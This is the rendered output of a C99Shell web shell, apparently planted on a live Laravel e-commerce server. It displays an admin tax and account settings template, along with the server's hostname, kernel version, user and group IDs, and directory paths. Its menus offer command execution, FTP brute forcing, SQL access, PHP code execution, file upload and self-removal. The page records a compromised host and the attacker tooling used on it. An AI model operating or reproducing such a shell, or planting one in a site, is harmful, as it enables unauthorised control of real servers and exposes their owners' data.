!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/resources/views/admin/setting/edit_tabs/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     option.blade.php (3.71 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="tab-pane" id="tab-option">
    <h3>Taxes</h3>
    <hr>
    <div class="pl-lg-4 row">
        <div class="col-md-4 form-group">
            <label for="config_price_with_tax" class="control-label">Display Price With Tax : </label>
            <div class="form-check form-check-inline">
                <label class="radio-inline">
                    <input class="form-check-input" type="radio" name="config_price_with_tax" id="config_price_with_tax" value="Yes" {{ \App\Models\Setting::setInputValue($data,'config_price_with_tax') == "Yes" ? 'checked' : '' }} > Yes
                </label>
              &nbsp; &nbsp;
                <label class="radio-inline">
                    <input class="form-check-input" type="radio" name="config_price_with_tax" id="config_price_with_tax" value="No" {{ \App\Models\Setting::setInputValue($data,'config_price_with_tax') == "No" ? 'checked' : '' }}> No
                </label>
            </div>
        </div>
    </div>

    <h3>Account</h3>
    <hr>
    <div class="pl-lg-4 row">



        <div class="col-md-4">
            <div class="form-group">
                <label for="config_max_login_attempt" class="control-label">Max Login Attempt</label>
                <input type="text" name="config_max_login_attempt" id="config_max_login_attempt" value="{{ old('config_max_login_attempt', \App\Models\Setting::setInputValue($data,'config_max_login_attempt')) }}" class="form-control" />
            </div>
        </div>
        <div class="col-md-4">
            <div class="form-group">
                <label for="config_invoice_prefix" class="control-label">Invoice Prefix</label>
                <input type="text" name="config_invoice_prefix" id="config_invoice_prefix" value="{{ old('config_invoice_prefix', \App\Models\Setting::setInputValue($data,'config_invoice_prefix')) }}" class="form-control" />
            </div>
        </div>



        <div class="col-md-4">
            <div class="form-group">
                <label for="config_checkout_terms" class="control-label">Checkout Terms</label>
                <select name="config_checkout_terms" id="config_checkout_terms" class="form-control">
                    @foreach(config('constant.checkout_terms') as $key => $val)
                        <option value="{{ $key }}" {{ \App\Models\Setting::setInputValue($data,'config_checkout_terms') == $key ? 'selected' : '' }}>{{ $val }}</option>
                    @endforeach
                </select>
            </div>
        </div>
    </div>


    <div class="pl-lg-4 row">


        <div class="col-md-4">
            <div class="form-group">
                <label for="config_order_status" class="control-label">Order Status</label>
                <select name="config_order_status" id="config_order_status" class="form-control">
                    @foreach(config('constant.order_status') as $key => $val)
                        <option value="{{ $key }}" {{ \App\Models\Setting::setInputValue($data,'config_order_status') == $key ? 'selected' : '' }}>{{ $val }}</option>
                    @endforeach
                </select>
            </div>
        </div>

        <div class="col-md-4">
            <div class="form-group">
                <label for="config_fraud_order_status" class="control-label">Fraud Order Status</label>
                <select name="config_fraud_order_status" id="config_fraud_order_status" class="form-control">
                    @foreach(config('constant.order_status') as $key => $val)
                        <option value="{{ $key }}" {{ \App\Models\Setting::setInputValue($data,'config_fraud_order_status') == $key ? 'selected' : '' }}>{{ $val }}</option>
                    @endforeach
                </select>
            </div>
        </div>
    </div>


</div>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--